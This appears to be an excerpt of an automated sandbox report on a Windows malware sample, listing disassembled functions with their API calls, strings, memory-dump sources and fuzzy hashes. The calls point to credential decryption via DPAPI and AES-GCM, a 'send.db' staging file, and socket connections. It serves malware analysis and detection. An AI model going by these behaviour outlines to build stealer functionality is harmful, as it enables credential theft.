Instruction ID: 331c6ee80983c3211a157d0e2f9c8a55f73bad1aa332cb8f258e5383a52bcc5e
Opcode Fuzzy Hash: ae202f107e02cf4bf0fa937bc14afba5fe48d501d56cc940ab3e3e6b8a9a574c
Instruction Fuzzy Hash: 5AA10A70D0021AABCF04EFE5C8959EEBB75BF54344F10452AE412BB291DB38A955CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004179B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 143COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,?,?), ref: 00417BAA

Strings

4 U, xrefs: 00417B44
P U, xrefs: 00417AFB
l U, xrefs: 00417AB2

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Event
String ID: 4 U$P U$l U
API String ID: 4201588131-3439511033
Opcode ID: 0a1ef25709333598554af929f4314139269dd5c2430288aee3b9a770cb331960
Instruction ID: 5eec71a8de6a34ee76f7cde18ad7771ef0b3a6eb068008444d0e6e96da407a5a
Opcode Fuzzy Hash: 0a1ef25709333598554af929f4314139269dd5c2430288aee3b9a770cb331960
Instruction Fuzzy Hash: D8519F31509206EFCB14DF15D868DAE7BB6FB9131AF10851AE806937B4C734FA89DB18

Uniqueness

Uniqueness Score: -1.00%

Function 004136C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 004136E0
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004136F0

Strings

RtlGetVersion, xrefs: 004136EA
ntdll.dll, xrefs: 004136D1

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: de4ec6f657e44ac8cc494aadf813ee8458ca923d9d134e9dc141dc9d2e802b37
Instruction ID: 879b66223c91d730e7f684fbae28da753e675ca23a3d003ae06517fcf66b590d
Opcode Fuzzy Hash: de4ec6f657e44ac8cc494aadf813ee8458ca923d9d134e9dc141dc9d2e802b37
Instruction Fuzzy Hash: 52411CB0E40128A6DF289F55D8463FA76F4AB1174EF0444E6F655E42C1E67CCFC8CA98

Uniqueness

Uniqueness Score: -1.00%

Function 00413068 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000017,00000001,00000006), ref: 00413081
connect.WS2_32(00000000,?,0000001C), ref: 004130A0
InetNtopW.WS2_32(00000017,?,?,00000802), ref: 004130D0

Strings

!.A, xrefs: 004130D6

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: InetNtopconnectsocket
String ID: !.A
API String ID: 2247632992-3423768047
Opcode ID: 7f46a9b08b7883a04bef076f00565a116d3bb34766e72cd5dfec897920c5d718
Instruction ID: 8ee353f56e7e21d62d8bb83bb58da629ea2f8efeca30cc48bc02d3b273a1e3b6
Opcode Fuzzy Hash: 7f46a9b08b7883a04bef076f00565a116d3bb34766e72cd5dfec897920c5d718
Instruction Fuzzy Hash: 59017C7190021CAADB20DBA49C4AFDBBBB8EF09720F004166F904E61C0E6B1AA0487E4

Uniqueness

Uniqueness Score: -1.00%

Function 004172FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000400,?), ref: 0041732A
lstrcatW.KERNEL32(?,send.db), ref: 0041733C

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Strings

send.db, xrefs: 00417330
5, xrefs: 0041736E

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
String ID: 5$send.db
API String ID: 891666058-2022884741
Opcode ID: 973328c7dd1fbac2d4fa13f10ec53beeab098ba614c0152af12497506cf1d864
Instruction ID: 88392d5fa4e5a04be5ccaed093d7f3709cc2e3ccb171eb8a5f460630b170cba0
Opcode Fuzzy Hash: 973328c7dd1fbac2d4fa13f10ec53beeab098ba614c0152af12497506cf1d864
Instruction Fuzzy Hash: 1801A1B1D4010DABCB10EB61DC45FEEB7BCAF91318F00807AB905B2081EB785A56CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 004131A4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 004131BC
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004131CC

Strings

RtlGetVersion, xrefs: 004131C6
ntdll.dll, xrefs: 004131AD

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: 954c458fee038cfec5e8dfedc7395ba56a67e96354d221747f86ce22752c28ff
Instruction ID: 1755defca0b3094eec41b44340e96f068711219bd0979160b030f66aa8b8de54
Opcode Fuzzy Hash: 954c458fee038cfec5e8dfedc7395ba56a67e96354d221747f86ce22752c28ff
Instruction Fuzzy Hash: 7DE0923174021C3ADF291F709C2F7D736EC4B05B44F0445A1E606E21C1EA7CCA848698

Uniqueness

Uniqueness Score: -1.00%

Function 004131F8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 00413210
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00413220

Strings

RtlGetVersion, xrefs: 0041321A
ntdll.dll, xrefs: 00413201

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: 2a1211ebd3b8e13e5751e4cb5b7b90c1e1ff80b7aab7daf7eaf0bda77c9d9c97
Instruction ID: 81026ad2ff029847c9d88a1ef8b271f3ce4965687aa33b4a17c8a6e15433995b
Opcode Fuzzy Hash: 2a1211ebd3b8e13e5751e4cb5b7b90c1e1ff80b7aab7daf7eaf0bda77c9d9c97
Instruction Fuzzy Hash: 6AE01A30B8021D66DB28AF71DD0ABD776A85B11B09F0084E5D606E2180EA78DEC9CE98

Uniqueness

Uniqueness Score: -1.00%

Function 004131A3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 004131BC
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004131CC

Strings

RtlGetVersion, xrefs: 004131C6
ntdll.dll, xrefs: 004131AD

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: ec10dec479f411f7009a569a636442f400530492141b64df036f9bc73cd12885
Instruction ID: 7cc199a0e0b0ca2c295242931d5afeaff28a715c7f61619cb37538e7c3eb5307
Opcode Fuzzy Hash: ec10dec479f411f7009a569a636442f400530492141b64df036f9bc73cd12885
Instruction Fuzzy Hash: FFE092307842183ADF295B708C2F7DB3EA84B06740F0445A5E605E21C1D57CCA888A58

Uniqueness

Uniqueness Score: -1.00%

Function 00414A05 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,?,00413904,?,?,00403D7B,000010AD,?), ref: 00414A1A
GetProcAddress.KERNEL32(00000000), ref: 00414A21

Strings

IsWow64Process, xrefs: 00414A0E
kernel32, xrefs: 00414A13

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: 17d8d49d6cc1a59c506c3288aaaabdd469afae48348351fddd831f3384dc1744
Instruction ID: 4f885a5e59466e5e0ab2d4218cf233a7c4259f30c61e97828f6dea3f7f250390
Opcode Fuzzy Hash: 17d8d49d6cc1a59c506c3288aaaabdd469afae48348351fddd831f3384dc1744
Instruction Fuzzy Hash: 92E08C32680208FBDB24DB90CD4ABDE77ACEB04755B604469B401A2180DBB89E00C758

Uniqueness

Uniqueness Score: -1.00%

Function 39CCFE40 Relevance: 6.5, Strings: 5, Instructions: 224COMMON

Download Yara Rule

Strings

.cmd, xrefs: 39CCFEE7
.pif, xrefs: 39CCFEF2
.lnk, xrefs: 39CCFEFD
.com, xrefs: 39CCFF08
.bat, xrefs: 39CCFF13

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: .bat$.cmd$.com$.lnk$.pif
API String ID: 0-2850852502
Opcode ID: b85acfb12aede18faf3cc33fb4c358eb793cb51e101cd6bdf3f99341123a3a8a
Instruction ID: be3454cdd8590b4c2e33af14b8ca914efd95ded02e139f01ef0497c9fe235017
Opcode Fuzzy Hash: b85acfb12aede18faf3cc33fb4c358eb793cb51e101cd6bdf3f99341123a3a8a
Instruction Fuzzy Hash: 878174B5A002189BDF60CF64DC85BDEB7B8AF48354F4041A9FA16E7180D730AE85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 39CF592D Relevance: 6.4, Strings: 5, Instructions: 109COMMON

Download Yara Rule

Strings

LogSeverity, xrefs: 39CF59BD
\Registry\Machine\System\CurrentControlSet\Control\Error Message Instrument\, xrefs: 39CF5941
EnableLogging, xrefs: 39CF598C
EnableDefaultReplyWOW, xrefs: 39CF59F9
@, xrefs: 39CF5971

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: @$EnableDefaultReplyWOW$EnableLogging$LogSeverity$\Registry\Machine\System\CurrentControlSet\Control\Error Message Instrument\
API String ID: 0-1435268854
Opcode ID: 742678234450ad6e569588b1f8e3e86d4545f63d57cb055e72e0bfe633247d27
Instruction ID: a5005413d716b12f502fc3c60f40bb1df0290057f1c36d367a45821d5ccb7a88
Opcode Fuzzy Hash: 742678234450ad6e569588b1f8e3e86d4545f63d57cb055e72e0bfe633247d27
Instruction Fuzzy Hash: 194117B1A0029CEFDB50DBE5ED45EEEBBBCEB08740F504026E602F6110D7319A468B61

Uniqueness

Uniqueness Score: -1.00%

Function 00410AD5 Relevance: 6.3, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00410AE6
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 00410B38

Part of subcall function 00404385: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00403AB8,?,?,00000000,exit,00000000,start), ref: 004043AA

Part of subcall function 00406871: getaddrinfo.WS2_32(75A901C0,00000000,00405EAB,00000000), ref: 004068C6
Part of subcall function 00406871: socket.WS2_32(00000002,00000001,00000000), ref: 004068DD
Part of subcall function 00406871: htons.WS2_32(?), ref: 00406903
Part of subcall function 00406871: freeaddrinfo.WS2_32(00000000), ref: 00406913
Part of subcall function 00406871: LoadLibraryA.KERNEL32(Ws2_32.dll), ref: 0040691E
Part of subcall function 00406871: GetProcAddress.KERNEL32(00000000,connect), ref: 0040692A
Part of subcall function 00406871: WSAConnect.WS2_32(?,?,00000010,00000000,00000000,00000000,00000000), ref: 0040693C

LeaveCriticalSection.KERNEL32(?), ref: 00410BBC
EnterCriticalSection.KERNEL32(?), ref: 00410BD9
LeaveCriticalSection.KERNEL32(?), ref: 00410BE3

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter$AddressConnectLibraryLoadProcfreeaddrinfogetaddrinfohtonslstrcpysocket
String ID:
API String ID: 1285003255-0
Opcode ID: 3d052d63be8cd1fa622c56ad35cf4df1cdde21eaa4208816846316a8d07a3bdd
Instruction ID: 8d16ff9d0e8018b3f9a5908f0ed35de53839b6b844acfbbcca84d31c6b20296c
Opcode Fuzzy Hash: 3d052d63be8cd1fa622c56ad35cf4df1cdde21eaa4208816846316a8d07a3bdd
Instruction Fuzzy Hash: 1531A671310106BBD705EBA6CD55FEAB7ACBF04358F10412AF519D31C1EBB8A994CB98

Uniqueness

Uniqueness Score: -1.00%

Function 39D2E971 Relevance: 6.3, Strings: 5, Instructions: 72COMMON

Download Yara Rule

Strings

RevokeDragDrop, xrefs: 39D2E9C5
OLE32.DLL, xrefs: 39D2E997
RegisterDragDrop, xrefs: 39D2E9B7
OleUninitialize, xrefs: 39D2E9A9
OleInitialize, xrefs: 39D2E988

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: OLE32.DLL$OleInitialize$OleUninitialize$RegisterDragDrop$RevokeDragDrop
API String ID: 0-653348308
Opcode ID: c0fcca76daa6727b6b31004e3811a36f3dad863b5fe38c869beea527136b73c3
Instruction ID: 60ed4455e93c3abc84d097392101f62ccc3a64a1a4b6e5f148dc2b2a9ec31e93
Opcode Fuzzy Hash: c0fcca76daa6727b6b31004e3811a36f3dad863b5fe38c869beea527136b73c3
Instruction Fuzzy Hash: 38211DB5D01259EFDF01CFA5D84699EBBB4FB0C354B508169E852FB250D730A901CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00412F8A Relevance: 6.1, APIs: 4, Instructions: 92networkCOMMON

Download Yara Rule

APIs

EntryPoint.DBKYOVYK(00002000,?,00000000,?,?,?,00000000), ref: 00412FA1

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

EntryPoint.DBKYOVYK(00002000,00002000,?,00000000,?,?,?,00000000), ref: 00412FA9
recv.WS2_32(00000000,00000000,00000008,00000000), ref: 00412FD2
recv.WS2_32(00000000,?,?,00000000), ref: 00413018

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: EntryHeapPointrecv$AllocateProcess
String ID:
API String ID: 3845457958-0
Opcode ID: 0a0eb37fb7be0de8e6733ec4f27c22539ce1ac8166ce37ba7206fb523df9a56b
Instruction ID: 6c95ec459eb5d300c121efc1571712ac5a21d30415a76b46f44e18c050f42c2c
Opcode Fuzzy Hash: 0a0eb37fb7be0de8e6733ec4f27c22539ce1ac8166ce37ba7206fb523df9a56b
Instruction Fuzzy Hash: CF31B171A00209BFEB118F79CC40AAEBBF5EF48354F24416AF914E72E0D634DA818B54

Uniqueness

Uniqueness Score: -1.00%

Function 004098EB Relevance: 6.1, APIs: 4, Instructions: 87synchronizationthreadCOMMON

Download Yara Rule

APIs

EntryPoint.DBKYOVYK(0000001C,?,?), ref: 004098FD

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

EntryPoint.DBKYOVYK(00000208,00000008,?,?), ref: 0040993F

Part of subcall function 00404656: lstrcpyW.KERNEL32(00000000,75A901C0), ref: 00404680

Part of subcall function 004045F0: lstrlenW.KERNEL32(75A901C0,0040466F,00417610,?,?,004152FA,00417648,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00417610,?,75A901C0,00000000), ref: 004045F7

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Part of subcall function 00414047: WaitForSingleObject.KERNEL32(?,000000FF,0040689B,75A901C0,?,?,00000000,00405EAB,?,?,?,?,?,?,75A901C0,00000000), ref: 0041404B

CreateThread.KERNEL32(00000000,00000000,004095AA,?,00000000,00000000), ref: 004099AE
ReleaseMutex.KERNEL32(?), ref: 004099CC

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: EntryHeapPointlstrcpy$AllocateCreateFreeMutexObjectProcessReleaseSingleThreadVirtualWaitlstrlen
String ID:
API String ID: 3105074316-0
Opcode ID: 0ee9d615b0a512d076f9dd086f635fa45bb4ce3ca1608653fe08a33f1b1c0153
Instruction ID: d02c039e0c644e70c0e431a139af2d184387b6f7872f78bb566f3c01bd947569
Opcode Fuzzy Hash: 0ee9d615b0a512d076f9dd086f635fa45bb4ce3ca1608653fe08a33f1b1c0153
Instruction Fuzzy Hash: E9317171900208AFCB04EF65D88599EBBB5EF84314F10806EF915AB282DB35EE44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041337B Relevance: 6.1, APIs: 4, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,00411758), ref: 00413386
FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,00411758), ref: 0041339A
LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,00411758), ref: 004133A6
FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,00411758), ref: 004133EB

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: LibraryLoadResource$FindFree
String ID:
API String ID: 3272429154-0
Opcode ID: d42cbea263f431226fe70bc329952255054bdd1e716af0e69b720f4654511e5d
Instruction ID: 4725a6e14f717f9b4203fa466e35b323296d165c9b0580d540de1dbfe7ccabe0
Opcode Fuzzy Hash: d42cbea263f431226fe70bc329952255054bdd1e716af0e69b720f4654511e5d
Instruction Fuzzy Hash: 5101D675700A06AFE3085F29DC99AA6B6A8FF48311704C239F825C33E0DB74DC91C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041035F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 004105C0: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004105DF
Part of subcall function 004105C0: LocalAlloc.KERNEL32(00000040,00000000,?,00410532,00000000,00000000,?,00000000,00000000,00000000), ref: 004105ED
Part of subcall function 004105C0: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00410603
Part of subcall function 004105C0: LocalFree.KERNEL32(00000000,?,00410532,00000000,00000000,?,00000000,00000000,00000000), ref: 00410611

LocalFree.KERNEL32(00000000,00000000,-0000003A,00000000,00000000,00000000), ref: 004103D8

Part of subcall function 004103E4: GetLastError.KERNEL32 ref: 0041044A

LocalFree.KERNEL32(?), ref: 004103D1

Part of subcall function 00410620: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,00000000,00000000,00000000,?,?,004103CB,?), ref: 0041063D
Part of subcall function 00410620: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,004103CB,?), ref: 00410656
Part of subcall function 00410620: BCryptGenerateSymmetricKey.BCRYPT(00000020,004103CB,00000000,00000000,?,00000020,00000000,?,004103CB,?), ref: 0041066B

Strings

DPAPI, xrefs: 00410387, 00410399
, xrefs: 004103B7

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
String ID: $DPAPI
API String ID: 379455710-1819349886
Opcode ID: c4889481f82b3aadfc8e343a1cd22f3a9b10da3475bf132d137355c0400b4468
Instruction ID: 6205c7293df98f698ee5f9d9d3b93a813271767c0c69039ebf39bd883a25484d
Opcode Fuzzy Hash: c4889481f82b3aadfc8e343a1cd22f3a9b10da3475bf132d137355c0400b4468
Instruction Fuzzy Hash: AA11A53150004DEBCB11DB65C9408DEBB7AEF45314B508167ED21E2251E7B4DFD5CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412798 Relevance: 6.0, APIs: 4, Instructions: 37threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004127A5
SetEvent.KERNEL32(00000000), ref: 004127B9
WaitForSingleObject.KERNEL32(0041E56C,00001388), ref: 004127C6
TerminateThread.KERNEL32(0041E56C,000000FE), ref: 004127D7

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Thread$CurrentEventObjectSingleTerminateWait
String ID:
API String ID: 2174867186-0
Opcode ID: b078072546872f8740d7dc47b1d78aa195c7cd8b0a943328c88df3615fbe11a8
Instruction ID: 4025b1e2e6964e4149b06d908524e39e276819915dc9f32b46de36b8368295e9
Opcode Fuzzy Hash: b078072546872f8740d7dc47b1d78aa195c7cd8b0a943328c88df3615fbe11a8
Instruction Fuzzy Hash: 46013631100601DBD734AF11E959ADA77F1EF54325F504A2EE052E18E1DBB86DE4CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00410D4B Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 10COMMON

Download Yara Rule

APIs

Part of subcall function 0040696E: WSAStartup.WS2_32(00000002,?), ref: 00406994

InitializeCriticalSection.KERNEL32(00552F50,0040135A), ref: 00410D6E

Strings

x+U, xrefs: 00410D74
|+U, xrefs: 00410D4B
\-U, xrefs: 00410D55

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSectionStartup
String ID: \-U$x+U$|+U
API String ID: 1298439237-3148661943
Opcode ID: 5cc0e30dee506918131165392e4bbf99d65643bb78a2e05c9829f87b85330c9b
Instruction ID: caab9294fd91c97b3828d2cd60278e492e92fd761d0b5a565b965c04052062b9
Opcode Fuzzy Hash: 5cc0e30dee506918131165392e4bbf99d65643bb78a2e05c9829f87b85330c9b
Instruction Fuzzy Hash: B0C0121AF943041282002B3228720A82A71BE6B71AF65823FB846255A1DB7419E9174A

Uniqueness

Uniqueness Score: -1.00%

Function 39CDB110 Relevance: 5.3, Strings: 4, Instructions: 337COMMON

Download Yara Rule

Strings

MS_WINHELP, xrefs: 39CDB173
MS_TCARDHELP, xrefs: 39D002B4
windows.hlp, xrefs: 39D004E0, 39D005CD
MS_POPUPHELP, xrefs: 39D002E4

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: MS_POPUPHELP$MS_TCARDHELP$MS_WINHELP$windows.hlp
API String ID: 0-1223848211
Opcode ID: edb0cb0deab1f2efa2935daabcf524841411944151e9099808bb147eef9d3293
